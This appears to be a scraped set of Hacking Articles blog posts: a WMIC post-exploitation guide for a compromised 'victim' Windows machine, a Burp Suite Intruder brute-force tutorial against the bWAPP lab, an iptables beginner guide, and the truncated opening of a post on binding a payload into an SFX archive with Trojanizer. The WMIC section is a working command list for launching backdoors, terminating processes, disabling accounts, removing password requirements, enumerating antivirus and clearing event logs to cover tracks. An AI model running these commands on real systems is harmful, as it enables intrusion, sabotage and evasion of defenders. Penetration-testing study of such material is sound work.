To do this, we first get a meterpreter session on the remote PC, which you can learn from here. After gaining the session, escalate its privileges to Administrator, which you can learn from here.

WMIC is run from the Windows cmd. To get a command prompt, type "shell" in the meterpreter session.

Now let’s look at the wmic commands and their working

WMIC

This command shows the global options of wmic. Global options set properties of the WMIC environment (namespace, output format, target node, credentials and so on); combined with the aliases (computersystem, process, useraccount, ...) they let us manage the system through the wmic environment.

Syntax/Example: wmic /?

Get System Roles, User Name, and Manufacturer

We can enumerate lots of information about the victim system, including its name, domain, manufacturer, model and much more, through the computersystem alias of wmic.

We add the following properties to get specific results:

Roles: lists all the roles the victim system plays, such as Workstation, Server, Browser etc.

Manufacturer: gives the manufacturer of the system. Some vulnerabilities are specific to a particular model from a particular manufacturer, so this information can be used to search for directly applicable vulnerabilities.

UserName: gives the currently logged-on user, which is very helpful for telling administrators from normal users.

/format:list: displays the output as a list (one property per line) instead of a table.

Example: wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles /format:list

Get the SIDs

To enumerate the SIDs of local and domain groups we use the group alias of wmic.

Syntax/Example: wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

As shown in the image below, we get the group name (Caption), its domain, whether it is a local group, its SID and its status.

Create a process

We can create processes on the victim's system using the process alias of wmic.

This is helpful for launching a backdoor, or, started in quantity, for exhausting the victim's memory.

Syntax: wmic process call create "[Process Name]"

Example: wmic process call create "taskmgr.exe"

As you can see in the screenshot below, the command not only creates the process but also returns its process ID, so we can manipulate that process later as needed.

Note: if the process creates a window (Task Manager, cmd, etc.), this command opens that window on the victim's desktop, which is likely to raise suspicion.

Change Priority of a Process

We can change the priority of any process running on the victim's system with the help of the process alias of wmic.

This is an important feature because it lets us manipulate processes: we can raise or lower the priority of any process of our choice. Lowering a process's priority starves it of CPU time and can make that application unresponsive; raising a process to Realtime can make the whole system unresponsive. The method is SetPriority and it takes a numeric value: 64 (Idle), 16384 (Below Normal), 32 (Normal), 32768 (Above Normal), 128 (High) or 256 (Realtime).

Example: wmic process where name="explorer.exe" call setpriority 64

Terminate a process

We can terminate a process running on the victim's system with the help of the process alias of wmic.

Example: wmic process where name="explorer.exe" call terminate

Get a list of Executable Files

We can get a list of the executable paths of running processes that are not under the Windows directory. Note that LIKE '%Windows%' is a substring match: it also hides a process running from a path such as C:\Users\demo\Windows\x.exe, so treat it as a quick filter rather than an exact one.

Example: wmic process where "NOT ExecutablePath LIKE '%Windows%'" get ExecutablePath

Get Folder Properties

To extract basic information about a folder on the victim's system we can use the fsdir alias of wmic.

It can enumerate the following information about a folder:

Compressed, CompressionMethod, CreationDate, FileSize, Readable, Writeable, System, Encrypted, EncryptionMethod and much more.

Example: wmic fsdir where "drive='c:' and filename='test'" get /format:list

Get File Properties

To extract basic information about a file on the victim's system we can use the datafile alias of wmic.

It can enumerate the following information about a file:

Compressed, CompressionMethod, CreationDate, FileSize, Readable, Writeable, System, Encrypted, EncryptionMethod and much more.

Syntax: wmic datafile where name='[Path of File]' get /format:list

Note that backslashes in the path have to be doubled, because the backslash is the escape character in WQL.

Example: wmic datafile where name='c:\\windows\\system32\\demo\\demo.txt' get /format:list

Locate System Files

The environment alias lists the environment variables, which reveal the paths of important system locations such as the temp folder, the Windows directory and much more.

Example: wmic environment get Description, VariableValue

From the image below you can read each VariableValue with its Description.

Get a list of Installed Applications

We can get a list of the applications installed on the victim's system through Windows Installer. Be aware that the product alias is slow and noisy: it makes Windows Installer validate every package it lists, which can trigger MSI repair actions and writes Windows Installer events to the Application log.

Example: wmic product get name

Get a list of Running Services

We can fetch the list of running services together with their start mode, i.e. whether they start automatically or have to be started manually.

Example: wmic service where (state="running") get caption, name, startmode

From the image below you can observe the StartMode ("Auto" or "Manual") and the state "Running" for the listed services.

Get Startup Services

We can enumerate autostart entries using the startup alias, which lists the programs run at logon from the Run registry keys and the Startup folders (these are autostart programs, not Windows services).

Example: wmic startup get Caption, Command

Get System Driver Details

We can enumerate driver details such as name, path and service type using the sysdriver alias.

This command gives the path of the driver file, its state (Running or Stopped) and its type (Kernel Driver or File System Driver).

Example: wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

Get OS Details

We can get a hint of the victim's location from the time zone the system is set to, which the os alias reports as CurrentTimeZone (the offset from UTC in minutes).

The os alias also gives the last boot-up time, the number of running processes, the number of logged-on users, the registered user, and information about physical and virtual memory.

Example: wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpTime, NumberOfProcesses, NumberOfUsers, Organization, RegisteredUser, Status /format:list

Get the Motherboard Details

We can use the baseboard alias of wmic to enumerate the motherboard details of the victim's system: manufacturer, product, serial number and version.

Example: wmic baseboard get Manufacturer, Product, SerialNumber, Version

Get BIOS Serial Number

We can use the bios alias of wmic to enumerate the BIOS details of the victim's system.

Example: wmic bios get SerialNumber

From the image below you can see the BIOS serial number we enumerated from the victim's system.

Get Hard Disk Details

We can enumerate information about the system's hard disks using the diskdrive alias.

It tells us the interface type, manufacturer and model name, and whether media is loaded.

Syntax: wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list

Get Hard Disk Partitions Details

We can get information about the hard disk partitions (logical drives) using the logicaldisk alias. The where clause drivetype=3 restricts the output to local fixed disks.

It gives us the name, compression status, file system (NTFS, FAT) and much more.

Syntax: wmic logicaldisk where drivetype=3 get Name, Compressed, Description, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName

From the image below you can read the description of each disk along with its file system (NTFS here), the available free space and other details as required.

Get Memory Cache Details

We can get information about the CPU cache memory using the memcache alias: name, block size, purpose and more.

Example: wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

From the image below you can observe that it shows details of two cache memories.

Get Memory Chip Details

We can get information about the RAM modules using the memorychip alias.

This gives us the serial number of each RAM module without removing it or being physically near the system.

Example: wmic memorychip get PartNumber, SerialNumber

Detect If victim system is a host OS or installed via VMware

We can find out whether the victim's system is running directly on hardware or as a virtual machine under VMware or VirtualBox by looking at the onboard devices.

Syntax: wmic onboarddevice get Description, DeviceType, Enabled, Status /format:list

In the image below, the highlighted text shows VMware in the description.

User Account Management

Lock a User Account

We can stop a local user from using their account with the useraccount alias by setting the Disabled property to true (setting it back to false re-enables the account).

Example: wmic useraccount where name='demo' set disabled=true

From the image below you can observe that we have successfully disabled the account of user "demo".

Remove Password requirement for logging

We can remove a local user's password requirement for login by using the useraccount alias.

Example: wmic useraccount where name='demo' set PasswordRequired=false

Rename a user account

We can rename a local user by using the useraccount alias.

Example: wmic useraccount where name='demo' rename hacker

Restrict user from changing a password

We can prevent a local user from changing their password by using the useraccount alias.

Example: wmic useraccount where name='hacker' set passwordchangeable=false

Get Antivirus Details

We can enumerate the antivirus products registered with Windows Security Center on the victim's system, along with the path of each product's executable and its state. The root\SecurityCenter2 namespace exists only on client editions of Windows; on Windows Server the query fails because the namespace is absent.

Syntax: wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayName, productState, pathToSignedProductExe

Clear System Logs

Wmic can be used to clear event logs using the nteventlog alias: select the log by its file name and call the ClearEventLog method. It can be a handy command while cleaning up after compromising a system, but clearing a log is itself logged: clearing the System log writes Event ID 104 to the System log and clearing the Security log writes Event ID 1102 to the Security log, so a defender watching for those IDs will notice.

Syntax: wmic nteventlog where filename='[logfilename]' cleareventlog

Example: wmic nteventlog where filename='system' cleareventlog
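Working with wmic output in a script means parsing it, and the executable-path filter above is easier to reason about once the data is in hand. The Python below is an added example, not code from the original post or from Microsoft: it does not call wmic, it parses constructed text laid out like the CSV that `wmic process get ExecutablePath,Name,ProcessId /format:csv` prints (a blank first line, then a header whose first column is Node), applies the article's LIKE '%Windows%' filter beside a stricter directory-prefix check, and quotes a path for a WQL where clause the way the datafile example above does (backslashes doubled). The host name, paths and PIDs in the sample are invented.

```python
"""Parse `wmic ... /format:csv` output and apply the article's path filter (added example)."""
import csv
import io
import ntpath

# Constructed sample, shaped like wmic's CSV output: blank first line, Node column first.
WMIC_SAMPLE = (
    "\r\n"
    "Node,ExecutablePath,Name,ProcessId\r\n"
    "DESKTOP-LAB,C:\\Windows\\explorer.exe,explorer.exe,1234\r\n"
    "DESKTOP-LAB,C:\\Windows\\System32\\svchost.exe,svchost.exe,812\r\n"
    "DESKTOP-LAB,C:\\Users\\demo\\AppData\\Local\\Temp\\update.exe,update.exe,4321\r\n"
    "DESKTOP-LAB,C:\\Users\\demo\\Windows\\helper.exe,helper.exe,5555\r\n"
    "DESKTOP-LAB,,System,4\r\n"
)


def wmic_csv_command(alias: str, properties: str, where: str = "") -> str:
    """Build the wmic command line whose output parse_wmic_csv() expects."""
    clause = f' where "{where}"' if where else ""
    return f"wmic {alias}{clause} get {properties} /format:csv"


def parse_wmic_csv(text: str) -> list:
    """Turn wmic CSV output into a list of dicts keyed by property name."""
    lines = [line for line in text.splitlines() if line.strip()]  # drop the leading blank line
    return list(csv.DictReader(io.StringIO("\n".join(lines))))


def like_windows_filter(records) -> list:
    """The article's WQL filter, NOT ExecutablePath LIKE '%Windows%': a substring match."""
    return [r["ExecutablePath"] for r in records
            if r["ExecutablePath"] and "windows" not in r["ExecutablePath"].lower()]


def outside_windir_filter(records, windir: str = "C:\\Windows") -> list:
    """Stricter check: keep paths that do not start with the real Windows directory."""
    prefix = ntpath.normcase(windir).rstrip("\\") + "\\"
    return [r["ExecutablePath"] for r in records
            if r["ExecutablePath"] and not ntpath.normcase(r["ExecutablePath"]).startswith(prefix)]


def wql_literal(value: str) -> str:
    """Quote a string for a WQL where clause: backslash is WQL's escape character."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


if __name__ == "__main__":
    print(wmic_csv_command("process", "ExecutablePath,Name,ProcessId"))
    records = parse_wmic_csv(WMIC_SAMPLE)
    print("LIKE filter:  ", like_windows_filter(records))
    print("prefix filter:", outside_windir_filter(records))
    print("where name=" + wql_literal("c:\\windows\\system32\\demo\\demo.txt"))
```

The two filters disagree on C:\Users\demo\Windows\helper.exe: the substring match hides it because the path contains "Windows", the prefix check reports it. When you redirect wmic output to a file it is written as UTF-16, so decode it accordingly before parsing.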

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Contact here

The post Post Exploitation Using WMIC (System Command) appeared first on Hacking Articles.

Payload Processing Rule in Burp suite (Part 1)


Hello friends!! Today we are going to discuss the "Payload Processing" option of Burp Suite, an advanced feature under the Intruder tab that is used when performing brute force attacks.

Payload Processing

Payload Processing means that, after payloads are generated by a payload type, they can be further manipulated or filtered by a set of processing rules and by payload encoding before they are inserted into the request.

Payload Processing Rules

These rules perform processing tasks on each payload before it is used. They are executed in sequence, in the order they are listed, and each rule operates on the output of the previous one, which can also help in debugging a configuration. Payload processing rules are useful where you need to derive different payloads from one list, or where you want to wrap payloads in a wider structure or encoding scheme.

There are 12 types of payload processing rules available:

  • Add prefix
  • Add suffix
  • Match / Replace
  • Substring
  • Reverse substring
  • Modify case
  • Encode  
  • Decode
  • Hash
  • Add raw payload
  • Skip if matches regex
  • Invoke Burp extension

Let’s start!!

Add Prefix

This processing rule adds a prefix before each payload.

First, we intercept the request of the login page in the bWAPP lab, where we give the default username and a wrong password. Click on login and Burp Suite captures the request of the login page in the Intercept tab.

Send the request to Intruder, select the password field as the payload position, then click on the Payloads option. Select the payload type Simple list and load a dictionary by clicking the Load button. We can either load a dictionary or add input strings manually using the Add button in the payload options, as shown in the image.

Before executing the attack we add the payload processing rule Add Prefix with the input string "hash", which is prepended to every string in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite does its work and tries each password. The moment it finds the correct value, the Length column of that response differs from the others, as shown in the image.

To confirm that the password matched, we enter it in the bWAPP login page, which logs us into the lab successfully. This confirms the attack worked, as shown in the image.

Add Suffix

This processing rule adds a suffix after each payload.

First, we intercept the request of the login page in the bWAPP lab, where we give the default username and a wrong password. Click on login and Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to Intruder through the Action tab and follow the steps below. Open the Intruder tab, select the Positions tab, where the password value is highlighted, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password, which means we need one dictionary file, for the password.

Now click on the Payloads option after selecting the payload position. Select the payload type Simple list and load a dictionary by clicking the Load button. We can either load a dictionary or add input strings manually using the Add button in the payload options, as shown in the image.

Before executing the attack we add the payload processing rule Add Suffix with the input string "1234", which is appended to every string in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax while Burp Suite does its work and tries each password. The moment it finds the correct value, the Length column of that response differs from the others, as shown in the image.

Use this combination of username and password to log in and verify that the brute force attack found the correct password.

Match / Replace

This processing rule replaces every part of the payload that matches a given regular expression with a replacement string.

First, we intercept the request of the login page in the bWAPP lab, where we give the default username and a wrong password. Click on login and Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to Intruder through the Action tab and follow the steps below. Open the Intruder tab, select the Positions tab, where the password value is highlighted, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password, which means we need one dictionary file, for the password.

Now click on the Payloads option after selecting the payload position. Select the payload type Simple list and load a dictionary by clicking the Load button. We can either load a dictionary or add input strings manually using the Add button in the payload options, as shown in the image.

Before executing the attack we add the payload processing rule Match / Replace with "9870" in Match regex, which is matched against every string in the dictionary; wherever it matches, that part is replaced with the "1234" given in Replace with, as shown in the image.

Select Start Attack in the Intruder menu.

Sit back and relax while Burp Suite does its work and tries each password. The moment it finds the correct value, the Length column of that response differs from the others, as shown in the image.

Use this combination of username and password to log in and verify that the brute force attack found the correct password.

Substring

This processing rule extracts a sub-portion of the payload, starting from a specified offset and running for a specified length. Here the offset and the length are counted from the front, and the offset is zero-based.

First, we intercept the request of the login page in the bWAPP lab, where we give the default username and a wrong password. Click on login and Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to Intruder through the Action tab and follow the steps below. Open the Intruder tab, select the Positions tab, where the password value is highlighted, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password, which means we need one dictionary file, for the password.

Now click on the Payloads option after selecting the payload position. Select the payload type Simple list and load a dictionary by clicking the Load button. Here we added the dictionary using the option "Add from list", as shown in the image below.

Before executing the attack we add the payload processing rule Substring with "0" in the From option, which specifies the offset, and "3" in the Length option, which specifies how many characters to keep.

For example, if "password" is a word in the dictionary, the characters are numbered p = 0, a = 1, s = 2, s = 3 and so on, so with offset 0 and length 3 the rule keeps only "pas" from the whole word "password"; to obtain "pass" the length would have to be 4.

Note that the rule only transforms each payload; it does not filter the list by length. A payload shorter than the window simply yields a shorter substring (empty if the payload does not reach the offset), and the request is still sent, as you can check in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax while Burp Suite does its work and tries each password. The moment it finds the correct value, the Length column of that response differs from the others, as shown in the image.

Use this combination of username and password to log in and verify that the brute force attack found the correct password.

Reverse Substring

This processing rule works like the Substring rule, but the end offset is counted backwards from the end of the payload, and the length is counted backwards from that end offset.

First, we intercept the request of the login page in the bWAPP lab, where we give the default username and a wrong password. Click on login and Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to Intruder through the Action tab and follow the steps below. Open the Intruder tab, select the Positions tab, where the password value is highlighted, and follow the steps below to select the payload position.

  • Press the Clear button at the right of the window.
  • Select the field we want to attack, i.e. the password field, and click the Add button.
  • Choose the attack type Sniper.
  • In the image below we have selected only the password, which means we need one dictionary file, for the password.

Now click on the Payloads option after selecting the payload position. Select the payload type Simple list and load a dictionary by clicking the Load button. Here we added the dictionary using the option "Add from list", as shown in the image below.

Before executing the attack we add the payload processing rule Reverse Substring with "2" in the From option, which is the end offset counted backwards from the end of the payload, and "9" in the Length option, which is counted backwards from that end offset.

For example, if "admin123456" is a word in the dictionary: counting from the end, 6 is at offset 0 and 5 at offset 1, so an end offset of 2 cuts off "56" and leaves "admin1234". The rule then takes 9 characters backwards from that point, which is exactly "admin1234", so that is the payload sent instead of the whole word "admin123456".

As with Substring, the rule only transforms each payload and does not filter the list by length; a shorter payload simply yields a shorter (possibly empty) substring, which you can check in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax while Burp Suite does its work and tries each password. The moment it finds the correct value, the Length column of that response differs from the others, as shown in the image.

Use this combination of username and password to log in and verify that the brute force attack found the correct password.

Modify Case

This processing rule can be used to modify the case of the payload, if needed. This rule has the same options available for the Case Modification payload type which we have explained in Part-1 of the Payload types article.
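To make the rule semantics above concrete, here is an added Python example (my own code, not Burp's) that models an Intruder processing chain: each rule is a function applied to every payload of a simple list, in order, exactly as Intruder applies its rules one after another. It implements Add prefix, Add suffix, Match / Replace, Substring, Reverse substring, Modify case and Skip if matches regex; the Substring and Reverse substring functions reproduce the "password" and "admin123456" examples from the text. The words in WORDLIST are constructed.

```python
"""Model of Burp Intruder payload processing rules (added example, not Burp code)."""
import re
from typing import Callable, List, Optional

Rule = Callable[[str], Optional[str]]   # a rule returns None to drop the payload


def add_prefix(prefix: str) -> Rule:
    return lambda p: prefix + p


def add_suffix(suffix: str) -> Rule:
    return lambda p: p + suffix


def match_replace(pattern: str, replacement: str) -> Rule:
    """Replace every part of the payload matching the regex."""
    rx = re.compile(pattern)
    return lambda p: rx.sub(replacement, p)


def substring(start: int, length: int) -> Rule:
    """Offset and length counted from the front, offset zero-based.
    A payload shorter than the window yields what remains; it is not dropped."""
    return lambda p: p[start:start + length]


def reverse_substring(end_offset: int, length: int) -> Rule:
    """end_offset counts back from the end of the payload; the window then
    extends `length` characters further back from that point."""
    def rule(p: str) -> str:
        end = max(0, len(p) - end_offset)
        return p[max(0, end - length):end]
    return rule


def modify_case(mode: str) -> Rule:
    modes = {
        "lower": str.lower,
        "upper": str.upper,
        "propername": lambda p: p[:1].upper() + p[1:].lower(),
        "toggle": str.swapcase,
    }
    return modes[mode]


def skip_if_matches(pattern: str) -> Rule:
    rx = re.compile(pattern)
    return lambda p: None if rx.search(p) else p


def process(wordlist, rules: List[Rule]) -> List[str]:
    """Run the rules in sequence over each payload, like Intruder's rule list."""
    out = []
    for payload in wordlist:
        for rule in rules:
            payload = rule(payload)
            if payload is None:        # skip rule fired: payload is not sent
                break
        else:
            out.append(payload)
    return out


WORDLIST = ["bug", "password", "admin123456", "9870", "test"]   # constructed sample

if __name__ == "__main__":
    print(process(WORDLIST, [substring(0, 3)]))
    print(process(WORDLIST, [reverse_substring(2, 9)]))
    print(process(WORDLIST, [match_replace("9870", "1234"), add_prefix("hash"), add_suffix("!")]))
    print(process(WORDLIST, [skip_if_matches(r"\d"), modify_case("propername")]))
```

Because the rules are chained, order matters: Add prefix followed by Substring(0, 3) keeps the first three characters of the prefixed string, whereas Substring first and then Add prefix keeps three characters of the original word.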

Source: portswigger.net

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Payload Processing Rule in Burp suite (Part 1) appeared first on Hacking Articles.

Beginner Guide to IPtables


Hello friends!! In this article we are going to discuss iptables and its uses. Iptables is a command-line firewall, installed by default on all official Ubuntu distributions. With iptables you define a set of rules that the Linux kernel applies to all incoming and outgoing network traffic.

Today we will look at some basic concepts of iptables, using various options to populate the filter table, which filters incoming and outgoing traffic.

Basic Iptables Options

-A : Append this rule to a rule chain.

-L : List the current filter rules.

-m conntrack : Allow filter rules to match based on connection state. Permits the use of the --ctstate option.

--ctstate : Define the list of states for the rule to match on. Valid states are:

  • NEW – The connection has not yet been seen.
  • RELATED – The connection is new, but is related to another connection already permitted.
  • ESTABLISHED – The connection is already established.
  • INVALID – The traffic couldn't be identified for some reason.

-m limit : Require the rule to match only a limited number of times. Allows the use of the --limit option.

Useful for limiting logging rules:

  • --limit – The maximum matching rate, given as a number followed by "/second", "/minute", "/hour" or "/day", depending on how often you want the rule to match. If -m limit is used without this option, the default is "3/hour".

-p : The protocol the rule applies to (tcp, udp, icmp, ...).

--dport : The destination port(s) required for this rule. A single port may be given, or a range as start:end, which matches all ports from start to end inclusive.

-j : Jump to the specified target. The basic targets are:

  • ACCEPT – Accept the packet and stop processing rules in this chain.
  • REJECT – Reject the packet, notify the sender that we did so, and stop processing rules in this chain.
  • DROP – Silently ignore the packet, and stop processing rules in this chain.
  • LOG – Log the packet and continue processing more rules in this chain.

-I : Insert a rule. Takes two arguments, the chain to insert the rule into and the position it should take; for example, -I INPUT 5 would insert the rule into the INPUT chain and make it the 5th rule in the list.

-s / --source : address[/mask] source specification.

-d / --destination : address[/mask] destination specification.

Iptables organises its rules in chains. A chain is an ordered list of firewall rules, and a packet is checked against the rules of the relevant chain from top to bottom: the first rule that matches decides its fate, and if no rule matches the chain's default policy applies.

Three Important Iptables Chains

INPUT chain: rules in the INPUT chain manage incoming traffic destined for the server itself.

OUTPUT chain: rules in the OUTPUT chain manage outgoing traffic originating from your server.

FORWARD chain: rules in the FORWARD chain apply to IP packets routed through the machine. This is used when a Linux machine acts as a router linking two networks together.

As described above, iptables is available by default on all Ubuntu distributions, but if it is not installed on your Linux system you can install it with the command below.

sudo apt-get install iptables

By default the chains are empty and their policy is ACCEPT, so all incoming and outgoing traffic passes without filtering. To see the current rules, execute the following command, which lists the rules of every chain.

sudo iptables -L -v

Here -L lists the chain rules and -v adds packet and byte counters and interface details. Note that rules added with iptables live in kernel memory only and are lost at reboot unless you save them (for example with iptables-save or the iptables-persistent package).

Allow Incoming Traffic

To allow traffic to a particular port you can use the commands below; here we accept incoming connections on port 22 for SSH, 80 for HTTP and 443 for HTTPS respectively.

sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT

These rules accept TCP connections arriving on ports 22, 80 and 443. With the INPUT chain still at its default policy of ACCEPT they change nothing by themselves; they become meaningful once the chain's default policy is changed to DROP or a catch-all DROP rule is appended after them.

Drop/Deny Incoming Traffic

To deny traffic to a particular port you can use the commands below; here we drop incoming connections on port 21 for FTP and 23 for Telnet respectively.

sudo iptables -A INPUT -p tcp --dport 21 -j DROP

sudo iptables -A INPUT -p tcp --dport 23 -j DROP

These rules silently discard TCP connections arriving on ports 21 and 23; the client gets no answer and eventually reports a timeout.

Reject Incoming Traffic

REJECT and DROP both stop incoming traffic from establishing a connection with the server. The difference is that REJECT discards the packet and sends an error back to the sender (for TCP the default is an ICMP "port unreachable" message), whereas DROP stays silent. You can use the command below; here we reject incoming connections on port 25 for SMTP.

sudo iptables -A INPUT -p tcp --dport 25 -j REJECT

This rule discards TCP connections arriving on port 25 and the client immediately sees "Destination port unreachable".

Allow Incoming Traffic from Specific IP

To allow traffic from a particular IP address, for example a trusted client that should always reach the server, execute the command below.

sudo iptables -A INPUT -s 192.168.1.104 -j ACCEPT

It accepts packets coming from the host 192.168.1.104.

Block Specific Network IP

To deny traffic from a particular IP address, for example to protect your server from an attacker's IP, execute the command below.

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

It drops packets coming from the host 192.168.1.102.

Block Specific Network Interface

To restrict a rule to a specific network interface, for example eth0, execute the command below, which drops incoming traffic from 10.10.10.10 arriving on eth0.

sudo iptables -A INPUT -i eth0 -s 10.10.10.10 -j DROP

You can change the action to allow traffic on a particular network interface by using -j ACCEPT instead.

Block Specific IP Range

To block a specific IP range, i.e. to deny incoming traffic from a range of addresses, execute the command below, which drops incoming packets from IP 192.168.1.100 up to IP 192.168.1.200.

sudo iptables -A INPUT -m iprange --src-range 192.168.1.100-192.168.1.200 -j DROP

You can change the action to allow traffic from a particular IP range by using -j ACCEPT instead.

Block Specific Mac Address

To block a specific MAC address, i.e. to deny incoming traffic from a specific machine, execute the command below, which drops incoming packets from the given MAC address (the attacker's machine). This only works for hosts on the same layer 2 segment, since the source MAC of routed traffic is that of the last router.

sudo iptables -A INPUT -m mac --mac-source FC:AA:14:6A:9A:A2 -j DROP

You can change the action to allow traffic from a particular MAC address by using -j ACCEPT instead.

Block Ping Request

Network administrators concerned with security often block ping requests, either with the DROP or the REJECT action. Here we block ping requests with DROP, as in the command below.

sudo iptables -A INPUT -p icmp -i eth0 -j DROP

View List of Applied Chain rules

To view the chain rules we have applied, execute the command below once again, which lists the iptables rules.

sudo iptables -L

In the image below you can observe five columns holding the records of the iptables rules.

These columns carry the following information:

target: the action applied.

prot: the protocol type, which can be tcp, udp, icmp or all.

opt: further options of the rule; blank here.

source: the source IP address of the incoming traffic.

destination: the destination IP address that receives the incoming packet.

Now if someone tries to ping the server machine, as shown in the image below, they get the message "Request timed out", which means the server machine has dropped the ICMP request packet.

Deleting Any Rule

To delete a rule from your filter table, use the -D option with the chain name and the rule number. We are going to remove our last rule, the ICMP drop, which is number 12 in the list of rules (count with sudo iptables -L --line-numbers to be sure, because the numbering shifts whenever a rule is removed).

sudo iptables -D INPUT 12

Replace 12 with the number of whichever rule you wish to remove from your list.

Let's view the remaining chain rules once again with the -L option as above. In the image below you can observe that the list now contains only 11 rules and the ICMP drop rule is gone.

Flush IPtables

If you want to remove the entire set of rules, flush your iptables rules with the -F option by executing the command below.

sudo iptables -F

When we list the rules once again, this time we get an empty table, as shown in the image below.
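The behaviour that matters most in the commands above is the one the listing does not show: the kernel walks the chain from the top and the first matching rule wins, so the order in which the rules were appended decides what happens to a packet. The Python below is an added example, not iptables code and not from the original article: it models the INPUT chain built above (the same 12 rules, addresses and MAC), evaluates constructed packets against it in first-match order, renders each rule back into its iptables command, and reproduces the -D INPUT 12 deletion by position. It ignores connection state and the mangle/nat tables; the INPUT policy is the default ACCEPT unless given otherwise.

```python
"""First-match simulator for the article's INPUT chain (added example, not iptables code)."""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Optional, Tuple


@dataclass
class Rule:
    target: str                              # ACCEPT, DROP or REJECT
    proto: Optional[str] = None              # -p
    dport: Optional[int] = None              # --dport
    src: Optional[str] = None                # -s
    src_range: Optional[Tuple[str, str]] = None  # -m iprange --src-range
    mac: Optional[str] = None                # -m mac --mac-source
    iface: Optional[str] = None              # -i

    def matches(self, pkt: dict) -> bool:
        """Every set field must match; unset fields match anything."""
        if self.proto and pkt["proto"] != self.proto:
            return False
        if self.dport is not None and pkt.get("dport") != self.dport:
            return False
        if self.src and pkt["src"] != self.src:
            return False
        if self.src_range:
            lo, hi = (ip_address(a) for a in self.src_range)
            if not lo <= ip_address(pkt["src"]) <= hi:
                return False
        if self.mac and pkt.get("mac", "").upper() != self.mac.upper():
            return False
        if self.iface and pkt.get("iface") != self.iface:
            return False
        return True

    def command(self, chain: str = "INPUT") -> str:
        """Render the rule as the iptables command that would append it."""
        parts = [f"sudo iptables -A {chain}"]
        if self.iface:
            parts.append(f"-i {self.iface}")
        if self.proto:
            parts.append(f"-p {self.proto}")
        if self.dport is not None:
            parts.append(f"--dport {self.dport}")
        if self.src:
            parts.append(f"-s {self.src}")
        if self.src_range:
            parts.append(f"-m iprange --src-range {self.src_range[0]}-{self.src_range[1]}")
        if self.mac:
            parts.append(f"-m mac --mac-source {self.mac}")
        parts.append(f"-j {self.target}")
        return " ".join(parts)


def evaluate(chain, pkt: dict, policy: str = "ACCEPT"):
    """Walk the chain top to bottom; the first match decides.
    Returns (verdict, 1-based rule number), or (policy, None) if nothing matched."""
    for number, rule in enumerate(chain, start=1):
        if rule.matches(pkt):
            return rule.target, number
    return policy, None


def delete_rule(chain, number: int) -> None:
    """iptables -D INPUT <n>: remove the rule at a 1-based position."""
    del chain[number - 1]


def article_chain():
    """The 12 INPUT rules appended in the article, in the order they were added."""
    return [
        Rule("ACCEPT", proto="tcp", dport=22),
        Rule("ACCEPT", proto="tcp", dport=80),
        Rule("ACCEPT", proto="tcp", dport=443),
        Rule("DROP", proto="tcp", dport=21),
        Rule("DROP", proto="tcp", dport=23),
        Rule("REJECT", proto="tcp", dport=25),
        Rule("ACCEPT", src="192.168.1.104"),
        Rule("DROP", src="192.168.1.102"),
        Rule("DROP", iface="eth0", src="10.10.10.10"),
        Rule("DROP", src_range=("192.168.1.100", "192.168.1.200")),
        Rule("DROP", mac="FC:AA:14:6A:9A:A2"),
        Rule("DROP", proto="icmp", iface="eth0"),
    ]


if __name__ == "__main__":
    chain = article_chain()
    ssh_from_blocked_range = {"proto": "tcp", "dport": 22, "src": "192.168.1.150", "iface": "eth0"}
    print(evaluate(chain, ssh_from_blocked_range))   # ACCEPT by rule 1, range DROP never reached
    print(evaluate(chain, {"proto": "tcp", "dport": 21, "src": "192.168.1.104", "iface": "eth0"}))
    print(chain[9].command())
    delete_rule(chain, 12)
    print(evaluate(chain, {"proto": "icmp", "src": "192.168.1.50", "iface": "eth0"}))
```

Two consequences are visible straight away: SSH from 192.168.1.150 is accepted by rule 1 even though rule 10 drops that whole range, and FTP from the trusted host 192.168.1.104 is dropped by rule 4 before its ACCEPT rule at position 7 is consulted. To make the per-host rules win, insert them at the top with -I INPUT 1 rather than appending them.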

Source: https://help.ubuntu.com/community/IptablesHowTo

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

The post Beginner Guide to IPtables appeared first on Hacking Articles.


Bind Payload using SFX archive with Trojanizer


The Trojanizer tool uses WinRAR to compress the two files supplied by the user into a self-extracting (SFX) executable archive (.exe). When the SFX archive is executed it runs both files, our payload and the legitimate application, at the same time.

How to get Trojanizer?

You can clone using this Github link:

Command: git clone https://github.com/r00t-3xp10it/trojanizer.git

